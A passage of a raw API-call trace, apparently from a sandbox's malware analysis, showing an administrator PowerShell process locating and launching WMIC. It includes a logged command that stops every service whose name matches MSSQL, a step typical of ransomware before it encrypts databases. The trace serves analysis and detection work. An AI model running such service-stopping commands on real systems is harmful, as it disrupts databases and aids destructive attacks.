ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5ec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x7e1c0e0 [0257.347] FindNextFileW (in: hFindFile=0x7e1c0e0, lpFindFileData=0x8b0e57c | out: lpFindFileData=0x8b0e57c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0257.348] FindClose (in: hFindFile=0x7e1c0e0 | out: hFindFile=0x7e1c0e0) returned 1 [0257.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0257.348] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0257.348] GetFileAttributesW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")) returned 0x20 [0257.350] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0eafc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0eafc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x20, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0257.350] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0257.350] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x20, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x20, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0257.351] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e644, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e644) returned 0x4550 [0257.351] GetConsoleWindow () returned 0x302b8 [0257.356] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e410, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0257.356] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0257.356] CoTaskMemAlloc (cb=0x804) returned 0x7e29ce0 [0257.356] GetConsoleTitleW (in: lpConsoleTitle=0x7e29ce0, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x49 [0257.358] CoTaskMemFree (pv=0x7e29ce0) [0257.358] CreateProcessW (in: lpApplicationName=0x0, lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x0, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\FD1HVy\\Desktop", lpStartupInfo=0x8b0e6c0*(cb=0x44, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x4dd992c | out: lpCommandLine="\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%MSSQL%%'\" call stopservice", lpProcessInformation=0x4dd992c*(hProcess=0x964, hThread=0x960, dwProcessId=0xed8, dwThreadId=0x1010)) returned 1 [0257.375] CloseHandle (hObject=0x960) returned 1 [0257.375] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e680, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e680) returned 0x4550 [0257.376] GetCurrentProcess () returned 0xffffffff [0257.376] GetCurrentProcess () returned 0xffffffff [0257.376] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0x964, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x8b0e904, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x8b0e904*=0x960) returned 1 [0257.376] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0e8fc*=0x960, lpdwindex=0x8b0e71c | out: lpdwindex=0x8b0e71c) returned 0x0 [0275.111] CloseHandle (hObject=0x960) returned 1 [0275.113] GetExitCodeProcess (in: hProcess=0x964, lpExitCode=0x8b0e968 | out: lpExitCode=0x8b0e968*=0x0) returned 1 [0275.114] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1 [0275.123] CloseHandle (hObject=0x964) returned 1 [0275.124] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea8c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea8c*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x20, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0275.127] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x20, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0275.127] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0275.127] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edf8*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edf8*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1e, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0275.128] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0275.128] SetEvent (hEvent=0x944) returned 1 [0275.128] SetEvent (hEvent=0x938) returned 1 [0275.128] SetEvent (hEvent=0x93c) returned 1 [0275.129] SetEvent (hEvent=0x940) returned 1 [0275.129] SetEvent (hEvent=0x954) returned 1 [0275.129] SetEvent (hEvent=0x948) returned 1 [0275.129] SetEvent (hEvent=0x94c) returned 1 [0275.129] SetEvent (hEvent=0x950) returned 1 [0275.129] SetEvent (hEvent=0x95c) returned 1 [0275.129] SetEvent (hEvent=0x958) returned 1 [0275.130] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x8b0ef8c*=0x84c, lpdwindex=0x8b0edac | out: lpdwindex=0x8b0edac) returned 0x0 [0275.135] SetThreadUILanguage (LangId=0x0) returned 0x6f0409 [0275.144] CoCreateGuid (in: pguid=0x8b0edf8 | out: pguid=0x8b0edf8*(Data1=0x13237841, Data2=0x8500, Data3=0x44c8, Data4=([0]=0xbf, [1]=0xb, [2]=0xc6, [3]=0x6e, [4]=0x68, [5]=0xa2, [6]=0xe2, [7]=0x15))) returned 0x0 [0275.144] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0edd8 | out: lpPerformanceCount=0x8b0edd8*=37017915302) returned 1 [0275.145] AmsiOpenSession () returned 0x0 [0275.145] AmsiScanString () returned 0x80070015 [0275.157] QueryPerformanceCounter (in: lpPerformanceCount=0x8b0eda0 | out: lpPerformanceCount=0x8b0eda0*=37019196273) returned 1 [0275.158] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0eb98, nSize=0xbc | out: lpBuffer="ҳ\x05") returned 0x0 [0275.158] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x44, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0275.158] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x1f, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0275.158] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x44, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x44, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0275.159] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0ee68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ee68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x45, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0275.159] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0edd4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0edd4*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x44, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0275.159] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x45, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0ee58*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x45, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0275.161] GetEnvironmentVariableW (in: lpName="PSModuleAutoLoadingPreference", lpBuffer=0x8b0e7a0, nSize=0xbc | out: lpBuffer="楕莹ㆌꬢ㿡抱롸ӝ\x04") returned 0x0 [0275.162] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x8b0e6bc, nSize=0xbc | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\WINDOWS\\system32;C:\\WINDOWS;C:\\WINDOWS\\System32\\Wbem;C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\;C:\\Users\\FD1HVy\\AppData\\Local\\Microsoft\\WindowsApps") returned 0xbb [0275.162] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a8, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0275.163] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x8770c8 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0275.163] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6b0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0275.164] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0275.164] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0275.164] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0275.164] GetFileAttributesExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath" (normalized: "c:\\programdata\\oracle\\java\\javapath"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x2410, ftCreationTime.dwLowDateTime=0xac5d590c, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xac5d590c, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xac5d590c, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 1 [0275.166] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0275.166] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0275.166] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x24 [0275.166] GetFullPathNameW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath", nBufferLength=0x24, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath", lpFilePart=0x0) returned 0x23 [0275.166] FindFirstFileW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0275.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0275.167] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0275.167] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0275.167] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0275.167] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0275.172] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6ec28c54, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xebb5ab66, ftLastAccessTime.dwHighDateTime=0x1d5d810, ftLastWriteTime.dwLowDateTime=0xebb5ab66, ftLastWriteTime.dwHighDateTime=0x1d5d810, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1 [0275.172] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0275.172] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0275.172] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x14 [0275.172] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\system32", nBufferLength=0x14, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\system32", lpFilePart=0x0) returned 0x13 [0275.172] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\system32\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0275.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0275.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0275.173] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0275.173] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0275.173] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0275.173] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0xc838b81d, ftLastAccessTime.dwHighDateTime=0x1d41dc3, ftLastWriteTime.dwLowDateTime=0xc838b81d, ftLastWriteTime.dwHighDateTime=0x1d41dc3, nFileSizeHigh=0x0, nFileSizeLow=0x7000)) returned 1 [0275.173] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0275.173] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0275.173] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0xb [0275.173] GetFullPathNameW (in: lpFileName="C:\\WINDOWS", nBufferLength=0xb, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS", lpFilePart=0x0) returned 0xa [0275.173] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0xffffffff [0275.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0275.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0275.174] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0275.174] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0275.174] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e7e8) returned 1 [0275.174] GetFileAttributesExW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem" (normalized: "c:\\windows\\system32\\wbem"), fInfoLevelId=0x0, lpFileInformation=0x8b0e864 | out: lpFileInformation=0x8b0e864*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x1856002a, ftCreationTime.dwHighDateTime=0x1d2a02b, ftLastAccessTime.dwLowDateTime=0xb288124d, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0xb288124d, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x8000)) returned 1 [0275.174] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e7e4) returned 1 [0275.174] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x8b0e864) returned 1 [0275.174] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x0, lpBuffer=0x0, lpFilePart=0x0 | out: lpBuffer=0x0, lpFilePart=0x0) returned 0x19 [0275.174] GetFullPathNameW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem", nBufferLength=0x19, lpBuffer=0x8770c8, lpFilePart=0x0 | out: lpBuffer="C:\\WINDOWS\\System32\\Wbem", lpFilePart=0x0) returned 0x18 [0275.174] FindFirstFileW (in: lpFileName="C:\\WINDOWS\\System32\\Wbem\\wmic.*", lpFindFileData=0x8b0e58c | out: lpFindFileData=0x8b0e58c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x6fc58640, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x6fc58640, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x6fc58640, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x5ec00, dwReserved0=0x0, dwReserved1=0x0, cFileName="WMIC.exe", cAlternateFileName="")) returned 0x7e1c8a0 [0275.174] FindNextFileW (in: hFindFile=0x7e1c8a0, lpFindFileData=0x8b0e57c | out: lpFindFileData=0x8b0e57c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0275.175] FindClose (in: hFindFile=0x7e1c8a0 | out: hFindFile=0x7e1c8a0) returned 1 [0275.175] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e804) returned 1 [0275.175] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x8b0e810) returned 1 [0275.175] GetFileAttributesW (lpFileName="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe" (normalized: "c:\\windows\\system32\\wbem\\wmic.exe")) returned 0x20 [0275.175] EtwEventActivityIdControl (in: ControlCode=0x3, ActivityId=0x8b0eafc*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0eafc*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x46, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0275.175] EtwEventActivityIdControl (in: ControlCode=0x1, ActivityId=0x8b0ea68*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)) | out: ActivityId=0x8b0ea68*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x45, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0275.175] EtwEventActivityIdControl (in: ControlCode=0x2, ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x46, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1)) | out: ActivityId=0x8b0eaec*(Data1=0xa8ae3886, Data2=0xf12a, Data3=0x0, Data4=([0]=0x46, [1]=0x52, [2]=0xae, [3]=0xa8, [4]=0x2a, [5]=0xf1, [6]=0xd5, [7]=0x1))) returned 0x0 [0275.176] SHGetFileInfoW (in: pszPath="C:\\WINDOWS\\System32\\Wbem\\WMIC.exe", dwFileAttributes=0x0, psfi=0x8b0e644, cbFileInfo=0x2b4, uFlags=0x2000 | out: psfi=0x8b0e644) returned 0x4550 [0275.177] GetConsoleWindow () returned 0x302b8 [0275.182] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e410, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0275.182] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x8b0e6a0, nSize=0xbc | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC;.CPL") returned 0x3a [0275.185] CoTaskMemAlloc (cb=0x804) returned 0x870068 [0275.185] GetConsoleTitleW (in: lpConsoleTitle=0x870068, nSize=0x400 | out: lpConsoleTitle="Administrator: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x49 [0275.186] 